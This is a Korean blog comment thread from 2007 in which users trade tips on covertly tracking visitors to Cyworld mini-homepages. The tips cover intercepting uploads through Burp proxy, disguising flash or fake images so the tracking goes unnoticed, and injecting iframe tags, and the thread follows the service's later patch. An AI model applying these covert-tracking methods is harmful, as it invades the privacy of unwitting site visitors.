Commented by ?? at 2007-02-28 02:07 # x

일단.. blank.php파일은 없이 잘 돌아가네요.

근데, 뭔가 몇가지 개선해야 할 점이..

1. fake.jpg파일을 로드전에 그 전의 세팅화면이 보이네요.
2. 위의 방법 ‘대로만’설정하면 익스플로러 이미지 도구모음과 우클릭 메뉴로 인하여,
플래쉬가 아닌 그림파일이라는 것을 바로 알 수 있는데.
플래쉬 파일을 만들때, 배경에 원하는 fake그림 파일을 넣어서 우클릭시에도 플래쉬 메뉴가 뜨도록
할 수 없을까요?

Commented by 쿠니쿠니 at 2007-02-28 09:43 # x

fake 그림파일이 플래시 메뉴가 뜨려면
이미지를 출력하지 않고 또 다른 플래시 파일을 넣으면 되죠.

Commented by 워니 at 2007-02-28 09:59 #

쭈운//
프록시는 인터넷으로 오고 가는 정보를 먼저 잡아내죠.
예를 들어 네이버를 들어갔다고 생각해봅시다.
쭈운님 컴퓨터에서 네이버 서버에 페이지를 요청합니다.
네이버에서는 자신의 페이지 정보를 주겠죠?
여기서 네이버가 준 정보를 프록시가 먼저 받아냅니다. 그리고는 쭈운님 컴퓨터에 넘겨줘야 하는데,
어잌후? 쭈운님 컴퓨터의 프록시 서버 127.0.0.1 이고(이것은 본인의 컴퓨터를 얘기합니다)
burp proxy가 켜져있지 않은 경우, 프록시서버는 하는일이 없으니 쭈운님의 익스플로러에게 정보를 주지 않게 되는겁니다. (켜져 있는 경우에도 forward를 하지 않으면 정보를 전달하지 않으니 마찬가지겠지요?)

하앜// 아, 그게 헷갈리셨군요 에구구;; 같은 빨간색으로 해놔서 지우라는 의미였는데, 죄송합니다;; (전 강조할때 `이런식’으로 표현하곤 하거든요;;)

비밀//
네, 저도 개인정보 침해가 맞다고 생각합니다.
단, 싸이월드에 방문자 기록 코드를 심어 넣는 것이 `싸이월드 가입 약관’에 어긋나기 때문에 그렇다고 생각하고 있습니다.
자주 등장하는 토론거리중 하나가 아닐까 하는군요.
노벨은 다이너마이트를 만들지 말아야 했을까요.
(어이구, 별것도 아닌 것 가지고 노벨의 다이너마이트에 비교하려고 하니 상당히 민망하군요)
나중에 포스팅 생각이었지만, 간단히 얘기하자면,
노벨이 만들지 않았어도 다이너마이트는 만들어 졌을 것입니다.
과학적 발명에 있어서 과학자의 가치판단이 필요하긴 하지만,
너무 많은 변수 때문에 과학적 발전을 억제하는 것은 부정적이라는 생각입니다.
(살 상을 위해 다이너마이트를 만드는 것은 과학자 스스로의 생각으로 가치판단을 할 수 있지만, 유용한 것에 쓰려고 다이너마이트를 생각할 때 `이것은 살상으로 쓰일 수 있으니 만들면 안된다’라고 강요할 수는 없다는 것이 제 생각입니다. - 음, 논란거리가 될수도 있는 화제군요 ㅠ_ㅠ)
… ㅎㅎ 너무 거창했는데, 그런게 아니고
싸이측에서 이런 방법을 막는 것은 그리 어려운 일이 아닙니다.
돈도 많이(엄청나게) 벌었을 텐데, 웹상의 보안도 더 발전시켜 나가야겠죠.
얽히고 섥혀서 함께 더 앞으로 나아갔으면 하는 바람이네요.
그런 이유로 죄송합니다만, 포스팅을 지우지는 않겠습니다.

수정했습니다 -
맨 뒤에 img 넣으면 이미지 출력하구요,
img 대신에 embed=플래시주소 넣으면 플래시 출력하도록 하였습니다.
(확인해보진 않았지만, 아마될꺼에요 ㅎㅎ)

크리스티아누//
오오~ 좋죠 ㅋ 85년생이에요, 지금 병역특례 중입니다~
왠지 제가 알고있는 사람일 것 같다는 느낌이 드네요-_- ㅋㅋㅋ

앗, 일해야지

Commented by 크리스티아누 at 2007-02-28 10:48 # x

휴 싸이공격일지 2번째의 흠님 리플을 참고로
스토리룸 로딩할 때 하얀 화면 바뀌는 거를
프린트 스크린샷 그림판 갖다 붙이기 신공으로 얻은 이미지로 대체해서
방문자 추적 눈치 못 채게 바꿨습니다
워니님과는 다른 방법으로 옛날 소스 좀 수정해서요…

휴 복잡하네요 한달 정도 지나면 어떻게 했는 지도 까먹어버릴 듯..;;;
워니님 흠님 모두 심심한 감사를 드리고요ㅋ
싸이측에서 안 막았으면 좋겠네요

그건 그렇고 싸이 믿을 게 정말 못 되는 것 같습니다;;
믿을만한 이야기 인지는 모르겠지만
php 조금만 공부해서 머리 굴리면 싸이 비공개 일촌공개 비밀글까지 볼 수 있다고 하더군요..

Commented by 하앜 at 2007-02-28 11:23 # x

워니// 아니에요^^ 이 방법 알려주시는것만으로도 감사할 따름~
크리스티아누// 와 정말 비공개글까지 볼수있나요? 궁금해지네..
전 소스나 태그는 문외한이라..;; 남들이 올린거 보면서 연구하는…

Commented by fan at 2007-02-28 13:30 # x

성공했어도 계속 댓글보러 오게된다는 ㅡ.,ㅡ ㅋㅋ

호오.. 비공개글을 볼수 있다??!!

ㅋㅋ

저는 이게 궁금한대요.

플래쉬 올릴수 있엇던 원리가 이쪽에서 proxy로 오고가는 정보를 잡아내서

그걸 약간 수정해준거 맞죠?

그럼 싸이에서 이쪽으로 보내주는 정보를 약간의 수정을 통하면

다른것도 할수 있는거 맞나요??

Commented at 2007-02-28 15:09 # x

비공개 덧글입니다.

Commented at 2007-02-28 16:17 # x

비공개 덧글입니다.

Commented by 워니 at 2007-02-28 16:48 #

fan//
예전엔 1촌으로 속이는게 가능했다고 하더군요 `예전엔’.
그때 되던 방법은 싸이월드 측에서 막아 놓은 것 같고, 다른 것은 보지 않아서 잘 모르겠네요.
그나저나, 그렇게 된다면 정말 심각한 사생활 침해이고,
싸이월드는 `너무’ 허술한 셈인데요-_-

비밀//
흠, 있긴 있을테지만,
일단은 좀 조용히 있으려구요 ㅎㅎ

비밀//
헉 -_-;; 무섭다아
… 델델델인데요;;

if문 한줄이면 막힐만한 방법인데 싸이월드가 방관하고 있는걸까요,
아니면 기자가 맘대로 터뜨려 버린 걸까요
(싸이월드 측에서도 그리 환영하지 않을 기사라고 생각합니다.)

잡혀가는건 아니겠죠? ㅠ_ㅠ 무섭다아

Commented by 지나가는이 at 2007-02-28 17:03 # x

http://news.naver.com/news/read.php?mode=LSS2D&office_id=025&article_id=0000647635&section_id=105&section_id2=226&menu_id=105

네이버에 기사떴네요..
싸이월드 방문자 추적 프로그램 또 유포

지난 1월 이 프로그램이 유포되면서 싸이월드는 싸이월드 이미지 편집기를 이용하지 않은 플래시 파일의 업로드를 막았다. 플래시 파일에 소스를 숨기는 경로 자체를 차단한 것이다. 하지만 최근 유포되고 있는 프로그램 설치 방법은 미니홈피의 게시판이나 사진첩 대신 스토리룸을 이용하는 방식이다.

Commented by fan at 2007-02-28 17:15 # x

헉..젝힐..ㅠ

Commented by 벙개 at 2007-02-28 18:00 # x

아핫, 이제 막힌것 같네요 ;;

Commented by 워니 at 2007-02-28 18:12 #

….허헛, 넵 그런것 같네요.
다이어리에도 where_chk를 넣었군요. 진작에 그러지-_- ㄲㄲ
플래쉬 올리는 것도 막아 놓았나 모르겠네요.
일단 현재 올라가 있는 플래시 주소는 바꿔놓지 않았군요.
(-_- 이거 근본적인 해결책이 아닌 듯 싶은데..)

여하튼, 다이어리에 리플로 달리는 것은 현재 막혔습니다.

Commented by 쭈운 at 2007-02-28 18:19 # x

기사 뜨니까 급하게 수정한 모양이군요.. -_-::

Commented by 워니 at 2007-02-28 18:19 #

ㅎㅎ엄청나긴 하겠지만, 기존에 관리만 잘 하고 있었다면 그리 무리가는 일 아니지 않을까요;;?

Commented by 지나가는이 at 2007-02-28 18:20 # x

where_chk 이건 뭐하는거에요?? 어디에있는지 체크?? ㅋㅋ

Commented by 워니 at 2007-02-28 18:22 #

네, 이름은 그런 것으로 정한 것 같고,
사용자 tid, 게시판 id, item_seq 정도를 이용해서 일정 숫자를 뱉어내는 것 같네요.
공식이 같지않으면 리플을 무시하는 것 같아요 - ㅋㅋ

Commented by 지나가는이 at 2007-02-28 18:23 # x

아… 임의 로 바뀌는 것인가…. ㅋㅋ..

Commented by 벙개 at 2007-02-28 18:24 # x

또 협박 쪽지 받기 전에 삭제해야지 안되겠네요.ㅋ

Commented by at 2007-02-28 18:30 # x

지나가던이// 근데 그렇게 하면 본인만 리플이 달리는걸로 알고 있는데.. 아닌가요?

Commented by 지나가는이 at 2007-02-28 18:31 # x

다른 사람도 달린답니다 <iframe> 태그로 그게시물 주소를 링크 시켜주면 됩니다..

Commented by 워니 at 2007-02-28 18:38 #

지나가는이//
음,미니홈피 게시판도 where_chk로 막힌지 꽤 오래된 것으로 알고있습니다.
클럽은 안막혀 있었던 것으로 알고 있었는데, 이번기회에 같이 막는지 안막는지 모르겠군요.

Commented by ?? at 2007-02-28 18:38 # x

나름 꽤 공부 해서 세팅했더니,
리플 다섯개 달리고 이렇게 끝인가요..ㅠ.ㅜ

Commented by 워니 at 2007-02-28 18:39 #

여튼, 게시판을 이용하지 않아도 기록하는 방법은 많이 있을 것으로 보입니다.

Commented by at 2007-02-28 18:39 # x

아 ~ 네

Commented by 지나가는이 at 2007-02-28 18:52 # x

근데 기자가 어디서 찾았을까요? 워니님 블로그??????

Commented by fan at 2007-02-28 19:16 # x

그럼.. 이제 끝난건가.. 겨우 이틀 써보고..휴…

좋은 경험이긴 했지만 너무 아쉽다…ㅠ

Commented by 하하 at 2007-02-28 19:16 # x

겔러리 쪽은 안되나요??

Commented by 크리스티아누 at 2007-02-28 19:17 # x

음…자다 일어나니까 이런 일이 벌어졌군요..ㅇ_ㅇ
누군가 제보를 했든지..
뭐 워니님 블로그도 구글에서 검색하면 잘 나오니까요..
포스트 제목이 방문자 추적이니..뭐 검색하면 걍 나오겠죠;;
저도 그렇게 해서 이 블로그를 처음 방문했고;

그렇게 빨리 기사가 뜰 줄이야..ㅠ
이틀도 사용 못 했는데..참참참….ㅠ

Commented by fan at 2007-02-28 19:20 # x

워니님 블로그 검색하면 쉽게 나오던대..

그럼 싸이월드 쪽에서도 찾기 쉽겟네..

휴. 기자도 대단하다. 금새 알아내다니..

워니님? 이제 방법이 없는걸까요?

전에 위쪽에 어떤분은 스토리룸 방법 막히면 아마 끝일꺼라고 하던대..ㅠ

Commented by R군 at 2007-02-28 19:26 # x

클럽에 리플이 달리는걸로 해보고싶지만
genbrd_shortreplyok.asp 이 파일의 주소를 모르겠네요;

Commented by 123 at 2007-02-28 19:57 # x